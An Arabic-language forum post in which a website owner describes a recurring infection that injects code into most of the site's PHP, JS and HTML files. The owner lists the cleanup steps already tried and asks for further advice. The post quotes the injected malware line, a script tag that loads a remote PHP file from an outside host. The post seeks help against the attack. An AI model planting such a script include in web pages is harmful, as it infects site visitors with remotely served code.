فايروس في موقعي وعملت كل الحلول والان محتاج تعطوني حلول ثانية

[عشاق بغداد]

السلام عليكم
من قبل اكثر من 5 ايام
ضرب موقعي فايروس
واكثر من 30 مواقع اعرفهم
بنفس الفايروس
جربت حذفت حذف نهائي للملفات
ورفع فقط اندكسين وحدة للمنتدى والثانية للواجهة
طبعآ بجهاز غير جهازي
وفيه Kaspersky Anti-Virus 2010 اصلي
ورجع الفايروس بعد مرور اقل من 12 ساعة
والفايروس غيريب جدآ
يضرب الملفات واحد واحد
يعني مو فقط الاندكس
اكثر ملفات المنتدى والدليل والتوبيكات والواجهات بكل انواعها
وكل انواع الملفات ان كانت php او js او htm او html وما يترك شي ابد
وبعد حذف كل شي ورفع الاندكسات الاثنين للمنتدى والواجهة رجع اكثر من مرة
قررت ابحث عليها في الملفات قبل www و public_html
وبعد عناء طويل
لقيت الفايروس
في ملف اسمة tmp وmail
كما موضح بالصورة



بعدها دخلت على ملف tmp لقيت ملفين
الاول اسمة webalizer
والثاني webalizerftp
كما موضوح بالصورة



الفايروس موجود في الملف الثاني webalizerftp
من ادخل عليه
اجد تقريبآ نفس ملفات الاول webalizer
ولكن الصفحات اللي بداخلة فيها فايروس
كما موضح بالصورة التالية



تم حذف جميع الملفات في الـ tmp
وحذف الملفات اللي في mail
وايظآ يرجع الفايروس
وموقعي محظور من قبل الكوكل
الخطوات اللي قمت بها
1- حذف جميع الملفات ورفع ملفات نظيفة من جهاز يحتوي على برنامج كاسبر سكاي اصلي محدث
2- رفع ملفات غير الملفات السابقة وترقية النسخة
3- عمل سكان من قبل المستظيف وما وجد شي
4- مثل ما قلت فوق حذفت ملفات لـ tmp وملفات mial واغلب الملفات اللي شفتها ما لها فائدة تم حذفها
5- عمل فحص لملف ملف داخل السي بنل يدويآ لحذف الفايروس وما جاب نتيجة
6- عملت ترخيص 111 لجميع الملفات والان هو يضرب الملفات اللي بالواجهة اللي ما عامل لها ترخيص 111
والان ما اعرف ايش اسوي ومحتاج نصائحكم اخواني
_________________________ _________
معلومات مفيدة :
اسم الفايروس Gifimage.php

كود الفايروس :

كود:

<script src=http://yantzen.com/ads4bucks/images/slr/hypercoverbiz-blue_041.php ></script>

_________________________ ____________

ملاحظة : عملت سكان وحذفت الملفات ورقيت يعني لا احد يقول اعمل سكان او رقي لانه هذه الحلول قمت بها وتعبت جدآ



اتمنى تساعدوني